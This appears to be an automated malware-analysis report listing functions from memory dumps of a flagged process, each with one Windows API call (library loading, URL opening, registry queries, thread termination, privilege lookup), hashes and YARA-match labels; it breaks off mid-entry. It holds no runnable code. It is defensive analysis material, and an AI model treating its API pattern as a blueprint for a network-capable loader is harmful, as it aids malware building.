Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: fe34904e95299d11d51c4059b907de6945cab77e98389f01fedc8d4dc711d08d
Instruction ID: bc342afa2e772b8d5c5d75f8e664ca82a198babc1b2f58c9b7210e3d9f060fee
Opcode Fuzzy Hash: fe34904e95299d11d51c4059b907de6945cab77e98389f01fedc8d4dc711d08d
Instruction Fuzzy Hash: AC41E130D4AB05CAEB7F491D4A683B675939F66724F46472F8E8B164D1D3F88480CE07

Uniqueness

Uniqueness Score: -1.00%

Function 01103866, Relevance: 1.6, APIs: 1, Instructions: 139libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,011038DE,?), ref: 011059DF

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: ae68a36afcc4df0876cd4ef0d4f63a302774bc37a0bb19231e5de7a791664195
Instruction ID: 706af7896fb5e2632d337dc1aa9e0c34bf035b430086f2fd5a25de50a617602e
Opcode Fuzzy Hash: ae68a36afcc4df0876cd4ef0d4f63a302774bc37a0bb19231e5de7a791664195
Instruction Fuzzy Hash: 56313770E58305DEDB6F1A688A94BFA2657AF17374F96422BAC53430C2E3E585848E13

Uniqueness

Uniqueness Score: -1.00%

Function 011024C6, Relevance: 1.6, APIs: 1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2902362c76dc76f76dbe91e4e53698da64766cc4dc7024e0734d1ff4c9bb5654
Instruction ID: b5a74f8331ac1c6149e3f2c350b103d88d163e132dc153472940b08097975c1d
Opcode Fuzzy Hash: 2902362c76dc76f76dbe91e4e53698da64766cc4dc7024e0734d1ff4c9bb5654
Instruction Fuzzy Hash: 13315830D48346DECF6F4A7808A47B52B639B07164F86469ADC834B1C7E3D184848F53

Uniqueness

Uniqueness Score: -1.00%

Function 01102393, Relevance: 1.6, APIs: 1, Instructions: 105threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(000000FE,00000000), ref: 011023B2

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 7df48457313459e180d9da9b1dce3745ac495f599d45d57e1d053c8853cc46cc
Instruction ID: 4513c1614bdb586c8d7205708d22f20e62090a95da72d9cfae08795dd549ed9c
Opcode Fuzzy Hash: 7df48457313459e180d9da9b1dce3745ac495f599d45d57e1d053c8853cc46cc
Instruction Fuzzy Hash: C1319D70A083029FDB1E5E58CAD97A87B57BF1A330F5942A5DC514B0D3E3F6C484C612

Uniqueness

Uniqueness Score: -1.00%

Function 01103CDC, Relevance: 1.6, APIs: 1, Instructions: 102networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 01103D85

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: 36eef5d8f63e02cd0cfba830719af1f1367b6edc899e94ca3bc30b84cf689cb7
Instruction ID: 38eaf730cf5937bf99cc35ce0de3e39b6f5bdac3a427f1334bfe4ae879a34f63
Opcode Fuzzy Hash: 36eef5d8f63e02cd0cfba830719af1f1367b6edc899e94ca3bc30b84cf689cb7
Instruction Fuzzy Hash: 9131F53079434BEFFB3A4E14DD51BEA3796BF46340F844129ED6A9A0C1D7B09944AB12

Uniqueness

Uniqueness Score: -1.00%

Function 0110237A, Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(000000FE,00000000), ref: 011023B2

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 625dac029f566c96b36cd03618433cb8ae6761daf2daf07a075c4144d36fea14
Instruction ID: 9d7dd9a4403d3368abfd06e5df82a99f211ccbee486853b7a0adef0366e05ac5
Opcode Fuzzy Hash: 625dac029f566c96b36cd03618433cb8ae6761daf2daf07a075c4144d36fea14
Instruction Fuzzy Hash: EF217870A143029EEF2F5E28CAD9BE93756BF16370FA54265DC62471D2E3E684848623

Uniqueness

Uniqueness Score: -1.00%

Function 011058D8, Relevance: 1.6, APIs: 1, Instructions: 93libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,011038DE,?), ref: 011059DF

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 67f88606e9796cb293b8d2ada496f201b6039b604a74835f3d647e14ac88eb50
Instruction ID: 50e8d1fc0cfc3646e7ec1dd604e52c3e61258a0d109fcb00629fb2f16c51397a
Opcode Fuzzy Hash: 67f88606e9796cb293b8d2ada496f201b6039b604a74835f3d647e14ac88eb50
Instruction Fuzzy Hash: 5D2168B1E4C35FED869F212419B67BD6D5F9B8B070F0513171C86860C1E7D582468E57

Uniqueness

Uniqueness Score: -1.00%

Function 01103D27, Relevance: 1.6, APIs: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 01103D85

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: 423a26e9abdd44c7d7ac8014c61d44199934e4fd39763fae8b47c5da700f0032
Instruction ID: 33839de59dc8b396f355650d4cdbe1970e9060f699b203579bdd2ab2cf26b204
Opcode Fuzzy Hash: 423a26e9abdd44c7d7ac8014c61d44199934e4fd39763fae8b47c5da700f0032
Instruction Fuzzy Hash: 8E212831A5838B9FFB3E4D24DD657EE3B55AF02250F444129DDAA8B0C1E7B09905D722

Uniqueness

Uniqueness Score: -1.00%

Function 1DC8A8D9, Relevance: 1.6, APIs: 1, Instructions: 90registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000EB4), ref: 1DC8A989

Memory Dump Source

Source File: 00000013.00000002.864298260.000000001DC8A000.00000040.00000001.sdmp, Offset: 1DC8A000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 83713e93be5afe48aa58cfe400920d5880292a12e102c13f0d69b0f12717bcb9
Instruction ID: 084aff148961aad27b185c07a288885c673ff23328995034b32f6d7c591dcc8c
Opcode Fuzzy Hash: 83713e93be5afe48aa58cfe400920d5880292a12e102c13f0d69b0f12717bcb9
Instruction Fuzzy Hash: DA318072408784AFE7128B25CC84F67FFBCEF06710F09899BE985DB152D264A949CB71

Uniqueness

Uniqueness Score: -1.00%

Function 1DC8A9D1, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EB4,C67B1AA3,00000000,00000000,00000000,00000000), ref: 1DC8AA8C

Memory Dump Source

Source File: 00000013.00000002.864298260.000000001DC8A000.00000040.00000001.sdmp, Offset: 1DC8A000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 513adaf1e904a93872db4b316923d944c42e44fba310fe276b0c317a64532acb
Instruction ID: 0a663c817ea0fb4481b7237644e3f296d5c05d338e7e574e060c70cd907ae0b9
Opcode Fuzzy Hash: 513adaf1e904a93872db4b316923d944c42e44fba310fe276b0c317a64532acb
Instruction Fuzzy Hash: 75319572505784AFD711CB25CC44FA3BFE8EF06714F18889AE945CB253D264E949CB61

Uniqueness

Uniqueness Score: -1.00%

Function 1DC8B464, Relevance: 1.6, APIs: 1, Instructions: 89COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,00000EB4,C67B1AA3,00000000,00000000,00000000,00000000), ref: 1DC8B4FE

Memory Dump Source

Source File: 00000013.00000002.864298260.000000001DC8A000.00000040.00000001.sdmp, Offset: 1DC8A000, based on PE: false

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: d77a810c465f65467c190357d106d2e68014732eecdbb3c090c68781c25af0fe
Instruction ID: 2017ad1fb995f5f8456f805f44f8e3fc2f876ac588998f1c282d071cb7001a9a
Opcode Fuzzy Hash: d77a810c465f65467c190357d106d2e68014732eecdbb3c090c68781c25af0fe
Instruction Fuzzy Hash: 6931D5B25093846FE7128F24DC45F56BFB8EF46324F0884DBE984DB193D264A909C771

Uniqueness

Uniqueness Score: -1.00%

Function 011059E4, Relevance: 1.6, APIs: 1, Instructions: 83libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,011038DE,?), ref: 011059DF

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: e3ce832dc290f2244e5a8e680c0352a57f1422ce359744b6cf799cc1fb10137d
Instruction ID: 8dde92e9c6a699dbbd0c89c2e287851e5ad7776ad365f4acc145df9329eb88e1
Opcode Fuzzy Hash: e3ce832dc290f2244e5a8e680c0352a57f1422ce359744b6cf799cc1fb10137d
Instruction Fuzzy Hash: F71127B6E4C3DBEA835F25300AB724DEE9F618B0B0709476606918F0D1F3959247CE96

Uniqueness

Uniqueness Score: -1.00%

Function 1DC8B55D, Relevance: 1.6, APIs: 1, Instructions: 82COMMON

Download Yara Rule

APIs

K32GetModuleInformation.KERNEL32(?,00000EB4,C67B1AA3,00000000,00000000,00000000,00000000), ref: 1DC8B5EE

Memory Dump Source

Source File: 00000013.00000002.864298260.000000001DC8A000.00000040.00000001.sdmp, Offset: 1DC8A000, based on PE: false

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: c37668aa280fa506d3f376c792f717d6537d4a94c71838ea0a8eec900ca09561
Instruction ID: 7d84ead491ef8543165d1806a517743984a88a2b86771e1e8cbdf22d2a9633b7
Opcode Fuzzy Hash: c37668aa280fa506d3f376c792f717d6537d4a94c71838ea0a8eec900ca09561
Instruction Fuzzy Hash: FD21B172505384AFE712CB65DC44F66BFA8EF46310F0884ABE945DB252D264E908CB71

Uniqueness

Uniqueness Score: -1.00%

Function 01103CF7, Relevance: 1.6, APIs: 1, Instructions: 81networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 01103D85

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: d29e44b22eb20aa4824cbba2206392e58215edb822328505696552e0209c3508
Instruction ID: 9cf6433158b10428b321a7c528dd84863e3e504aec59bdad03fa413501478063
Opcode Fuzzy Hash: d29e44b22eb20aa4824cbba2206392e58215edb822328505696552e0209c3508
Instruction Fuzzy Hash: CC21F83079434BEFFF3A8E14DD55BFA3769AF06340F444129EE6A9A0C1D7B09944A722

Uniqueness

Uniqueness Score: -1.00%

Function 1DC8B654, Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

K32GetModuleFileNameExW.KERNEL32(?,00000EB4,?,?), ref: 1DC8B6FA

Memory Dump Source

Source File: 00000013.00000002.864298260.000000001DC8A000.00000040.00000001.sdmp, Offset: 1DC8A000, based on PE: false

Similarity

API ID: FileModuleName
String ID:
API String ID: 514040917-0
Opcode ID: 176ac2719574e301177c99fa1177277c1d246c5943baa01d922f3e9eac1c7436
Instruction ID: 075093e3138e5bae4aca6419c1932795341efd78d7bbd915ec825b23841eee5b
Opcode Fuzzy Hash: 176ac2719574e301177c99fa1177277c1d246c5943baa01d922f3e9eac1c7436
Instruction Fuzzy Hash: 6C21A0714093C06FD3128B65CC55F66BFB4EF87610F0984DBE8848B2A3D624A909CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 01102710, Relevance: 1.6, APIs: 1, Instructions: 76libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,011038DE,?), ref: 011059DF

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 21cd4950df66c0a2225c737e5e8b18ba87c8a43ec5e5449fce1cfcf3cff5b6b2
Instruction ID: b76e4e5765c43d526da7cee8d992bd5939e799ecbb7a83966fd3781a582b5336
Opcode Fuzzy Hash: 21cd4950df66c0a2225c737e5e8b18ba87c8a43ec5e5449fce1cfcf3cff5b6b2
Instruction Fuzzy Hash: 2B114870D9C309DDDEBF21690AA47FA121B8F172B8F92571BAC57030C2E7E585844D43

Uniqueness

Uniqueness Score: -1.00%

Function 1DC8B2C4, Relevance: 1.6, APIs: 1, Instructions: 76registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EB4,?,?), ref: 1DC8B35E

Memory Dump Source

Source File: 00000013.00000002.864298260.000000001DC8A000.00000040.00000001.sdmp, Offset: 1DC8A000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 599b59ee49d450292cba77be15d3b40b257eb7fc768e596b3b931fbaf3c1962e
Instruction ID: dc77aa91c121e39cdcc92fe3255c66c43cdc35d28034b09eccfe3ef9612d0fc4
Opcode Fuzzy Hash: 599b59ee49d450292cba77be15d3b40b257eb7fc768e596b3b931fbaf3c1962e
Instruction Fuzzy Hash: D421F5754093C06FD3138B25CC51F62BFB4EF87A10F0A81CBE8848B693D225A919C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 206704F0, Relevance: 1.6, APIs: 1, Instructions: 76libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,00000EB4), ref: 2067058B

Memory Dump Source

Source File: 00000013.00000002.865836823.0000000020670000.00000040.00000001.sdmp, Offset: 20670000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 1c3f1545bc967a28f5128b96a08d98d58a5ef4966993be2b5873fbc6184236a3
Instruction ID: 0689667be8189ccde691c89c9900721a8a945b65bdffc3ec361525c28688cd51
Opcode Fuzzy Hash: 1c3f1545bc967a28f5128b96a08d98d58a5ef4966993be2b5873fbc6184236a3
Instruction Fuzzy Hash: 4C21D771009380AFF7128B24CD45F96BFB8DF46724F1884DAED849F193C264A949CB71

Uniqueness

Uniqueness Score: -1.00%

Function 01105897, Relevance: 1.6, APIs: 1, Instructions: 75libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,011038DE,?), ref: 011059DF

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: e5a13697e2f730bdeb1c6b229f170d9c0e353b02e1b92bb11c0de5955e72c30f
Instruction ID: 38ff275994efa848d415445b587b5d4535d328d4b61b33a4c4a3756f3df5947f
Opcode Fuzzy Hash: e5a13697e2f730bdeb1c6b229f170d9c0e353b02e1b92bb11c0de5955e72c30f
Instruction Fuzzy Hash: A1115770D8C39EED86AF35240AB63BD6D5B5B4B074F06532B0C82860C1E7E48246CE43

Uniqueness

Uniqueness Score: -1.00%

Function 1DC8A90A, Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000EB4), ref: 1DC8A989

Memory Dump Source

Source File: 00000013.00000002.864298260.000000001DC8A000.00000040.00000001.sdmp, Offset: 1DC8A000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 3aeb6f5e56bc4d563138b9049b252250866143af1ea66bbe49b3d98b09f88582
Instruction ID: 89334b80035b68cdb04458b740b52d526f6153e56d530b4764bfb9f741d1d1b0
Opcode Fuzzy Hash: 3aeb6f5e56bc4d563138b9049b252250866143af1ea66bbe49b3d98b09f88582
Instruction Fuzzy Hash: 75219F72504604AEE7219B59CC44F6BFBACEF04720F04895AFA44DB242D660E5098BB2

Uniqueness

Uniqueness Score: -1.00%

Function 0110596F, Relevance: 1.6, APIs: 1, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,011038DE,?), ref: 011059DF

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 0610dbfc6a62afaf45e9aeebf6768c5b151db35cdddab6b1e5ceb57a12fbbdc3
Instruction ID: 8c54c7c612e0123e7004eb39e3b0166412b4df9af41c408630516b12361dfd6e
Opcode Fuzzy Hash: 0610dbfc6a62afaf45e9aeebf6768c5b151db35cdddab6b1e5ceb57a12fbbdc3
Instruction Fuzzy Hash: 21113D72E4C38FDA479F253409F275D9D5F558B0B070A876A04A18B4D1FB90D64ACEC2

Uniqueness

Uniqueness Score: -1.00%

Function 1DC8ACEF, Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 1DC8AD6A

Memory Dump Source

Source File: 00000013.00000002.864298260.000000001DC8A000.00000040.00000001.sdmp, Offset: 1DC8A000, based on PE: false

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 31f0cd8b6918e52a6be3c5a2ed510b83bf8ff16908afe39c390f1be03858623b
Instruction ID: 1cd8465924fd03fdaaf5f1495a7102f40269086e10800fe391a75dcb8dc2b7ef
Opcode Fuzzy Hash: 31f0cd8b6918e52a6be3c5a2ed510b83bf8ff16908afe39c390f1be03858623b
Instruction Fuzzy Hash: E4217FB65093845FD7128B65DC85B93BFE8AF42210F0984EBD985CB263D274E908C762

Uniqueness

Uniqueness Score: -1.00%

Function 01103D6B, Relevance: 1.6, APIs: 1, Instructions: 71networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 01103D85

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: 59b5804ff48386696a931edf62def6b5f1b7e59c4b64f44f403941da43b79832
Instruction ID: e809f46a3cf6c14ac93e22fda99fb9a79c11de646242fc347654ac3657963b23
Opcode Fuzzy Hash: 59b5804ff48386696a931edf62def6b5f1b7e59c4b64f44f403941da43b79832
Instruction Fuzzy Hash: C821E730A9438BDFEB3A4E18CD517EE3B5A7F06250F444235DD6A8A0C1E7B19945E721

Uniqueness

Uniqueness Score: -1.00%

Function 1DC8AA12, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EB4,C67B1AA3,00000000,00000000,00000000,00000000), ref: 1DC8AA8C

Memory Dump Source

Source File: 00000013.00000002.864298260.000000001DC8A000.00000040.00000001.sdmp, Offset: 1DC8A000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 16663da87b532bd696855f1582efda29972dc895643d38cb183e9accf7b8d138
Instruction ID: 3eba16eba449eb5447c5bde9d3ba13c1718da0289afa331730b9913340da2f9f
Opcode Fuzzy Hash: 16663da87b532bd696855f1582efda29972dc895643d38cb183e9accf7b8d138
Instruction Fuzzy Hash: BA218E72600604AFE721CF19CD84FA7BBECEF04714F14886AEA45DB652D660E909CF72

Uniqueness

Uniqueness Score: -1.00%

Function 1DC8AAFB, Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

MkParseDisplayName.OLE32(?,00000EB4,?,?), ref: 1DC8AB7E

Memory Dump Source

Source File: 00000013.00000002.864298260.000000001DC8A000.00000040.00000001.sdmp, Offset: 1DC8A000, based on PE: false

Similarity

API ID: DisplayNameParse
String ID:
API String ID: 3580041360-0
Opcode ID: 8af5b91284812e9d044e51d8185233f7f465770d06a1d73222cfe1f07dfcbbca
Instruction ID: a54b6ee2a23b16897433497169a413e6051f19dd592e694e9ca970ea27f2745a
Opcode Fuzzy Hash: 8af5b91284812e9d044e51d8185233f7f465770d06a1d73222cfe1f07dfcbbca
Instruction Fuzzy Hash: 4621A5715493806FD3128B25DC41F72BFB4EF87620F0981DAED848B653D224B915CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 1DC8B58A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

K32GetModuleInformation.KERNEL32(?,00000EB4,C67B1AA3,00000000,00000000,00000000,00000000), ref: 1DC8B5EE

Memory Dump Source

Source File: 00000013.00000002.864298260.000000001DC8A000.00000040.00000001.sdmp, Offset: 1DC8A000, based on PE: false

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: a3ef399e27f1c13420ba019e8cce32ee8324daad85f8a2d9e9ca8ed903779998
Instruction ID: 6f797ce7bf027ff5cb0ddfd76dec1a9ebe2af3c7645cfdf8614339245348369b
Opcode Fuzzy Hash: a3ef399e27f1c13420ba019e8cce32ee8324daad85f8a2d9e9ca8ed903779998
Instruction Fuzzy Hash: B211B171500204AFE711CF55DC85F6BBBA8EF45714F04886BEE09DB242D6B0E5088BB2

Uniqueness

Uniqueness Score: -1.00%

Function 01105877, Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,011038DE,?), ref: 011059DF

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 0742ef4fb745188720b598fce027d72a99f1de304145ef178b52237d96f7c8cf
Instruction ID: 74a0785f29561a31217daa2e72992781d63f1d5d0537b259652df5804d5f9568
Opcode Fuzzy Hash: 0742ef4fb745188720b598fce027d72a99f1de304145ef178b52237d96f7c8cf
Instruction Fuzzy Hash: 9201F570D8C35AEDDAAF316809A57BE161B4B47274F42561BAC43430C6E7D485898E43

Uniqueness

Uniqueness Score: -1.00%

Function 01105923, Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,011038DE,?), ref: 011059DF

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 9fb3a3801c6480c5bfdf187ebafad7a5f017012eaf84d4ed12a689ecf344cd59
Instruction ID: e53ad5707458bcbdbff0148ee667199f5c5f5c77bb9c1fe55df339094cc3339e
Opcode Fuzzy Hash: 9fb3a3801c6480c5bfdf187ebafad7a5f017012eaf84d4ed12a689ecf344cd59
Instruction Fuzzy Hash: CD019CB0E4C39FE986DF212409753BD591F164B174F46131B1D83870C1F3D082458E67

Uniqueness

Uniqueness Score: -1.00%

Function 1DC8B4A2, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,00000EB4,C67B1AA3,00000000,00000000,00000000,00000000), ref: 1DC8B4FE

Memory Dump Source

Source File: 00000013.00000002.864298260.000000001DC8A000.00000040.00000001.sdmp, Offset: 1DC8A000, based on PE: false

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: 248a6292a2b3c0d1789d9c5c309175b31ad3b3287b254e275b5e18c8d8ea213a
Instruction ID: 3e1994baebaa3a2f815c4684cdbcd4ad28793da3b91d339989f27785ddbd0599
Opcode Fuzzy Hash: 248a6292a2b3c0d1789d9c5c309175b31ad3b3287b254e275b5e18c8d8ea213a
Instruction Fuzzy Hash: 0311C472500204AFEB11CF59DD45F57FBA8EF45720F14886BEE48DB242D674A508CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 1DC8A78B, Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1DC8A7F6

Memory Dump Source

Source File: 00000013.00000002.864298260.000000001DC8A000.00000040.00000001.sdmp, Offset: 1DC8A000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 4739936e91d4ff3e9b652522255bea2dd955dbf684db5d4b49bf12bc33d8ee87
Instruction ID: c89488370ddf870e0d32c71fbff0cac43ef66a7a2a5637721795d1c0903d3291
Opcode Fuzzy Hash: 4739936e91d4ff3e9b652522255bea2dd955dbf684db5d4b49bf12bc33d8ee87
Instruction Fuzzy Hash: C111A272409380AFDB128F54DC44E62FFF4EF46210F0889DAEE898B153D275A518DB71

Uniqueness

Uniqueness Score: -1.00%

Function 1DC8A836, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,C67B1AA3,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 1DC8A8A8

Memory Dump Source

Source File: 00000013.00000002.864298260.000000001DC8A000.00000040.00000001.sdmp, Offset: 1DC8A000, based on PE: false

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 8aad6af4557713721f4e5ebd010ec39cb96cab85ceef540bfc40d7908a89cd6d
Instruction ID: c872b7f39d8c41cd21aefaba7df88cc1f1bcebba99ec8e5440e257019031224c
Opcode Fuzzy Hash: 8aad6af4557713721f4e5ebd010ec39cb96cab85ceef540bfc40d7908a89cd6d
Instruction Fuzzy Hash: 13119A714093C4AFD7138B25DC84B62BFB4DF03224F0984DAED849F2A3D2696908DB72

Uniqueness

Uniqueness Score: -1.00%

Function 01105828, Relevance: 1.6, APIs: 1, Instructions: 59libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,011038DE,?), ref: 011059DF

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 9854693b5c21f32588669f26dd8cb7446ca39e2baed127b7b91e20de5430cb59
Instruction ID: 8aa08c7b4e6ee7de9897104453161a901f051d60b1b660b41f309ea870860d93
Opcode Fuzzy Hash: 9854693b5c21f32588669f26dd8cb7446ca39e2baed127b7b91e20de5430cb59
Instruction Fuzzy Hash: 0901F230D8C31AE9DAEF266909A47BE12274F132B8E52571FAC53420C6E7D485888E53

Uniqueness

Uniqueness Score: -1.00%

Function 20670522, Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,00000EB4), ref: 2067058B

Memory Dump Source

Source File: 00000013.00000002.865836823.0000000020670000.00000040.00000001.sdmp, Offset: 20670000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 7bdfb1108b4af8a3732243eedbb4d6a8016a6ba9bbaf2f7a4f17e19391ecf430
Instruction ID: 4fb19570ab86050b1d481aa0ef5d5b5f743fa90991e47b7b380a2ba4109531ab
Opcode Fuzzy Hash: 7bdfb1108b4af8a3732243eedbb4d6a8016a6ba9bbaf2f7a4f17e19391ecf430
Instruction Fuzzy Hash: F311C271500300EEF7209B15DD41FA6BBA8DF45720F14C45AEE445A292D2B4A9088AB1

Uniqueness

Uniqueness Score: -1.00%

Function 01105907, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,011038DE,?), ref: 011059DF

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 8e9ea067e464e5565dd595e94622470a3f0b3f26570e670d3ff75462e2149dbb
Instruction ID: fe5f6bea747dea1c96d11a5b73872a21d2d236b076cc847421d21d7bc8289ef4
Opcode Fuzzy Hash: 8e9ea067e464e5565dd595e94622470a3f0b3f26570e670d3ff75462e2149dbb
Instruction Fuzzy Hash: 7B014231E8C39AEAC79F21340DA83BD6A6B0A0B174F06521F1C828B0C2E3C481898E43

Uniqueness

Uniqueness Score: -1.00%

Function 01105944, Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,011038DE,?), ref: 011059DF

Memory Dump Source

Source File: 00000013.00000002.859923887.0000000001102000.00000040.00000001.sdmp, Offset: 01102000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
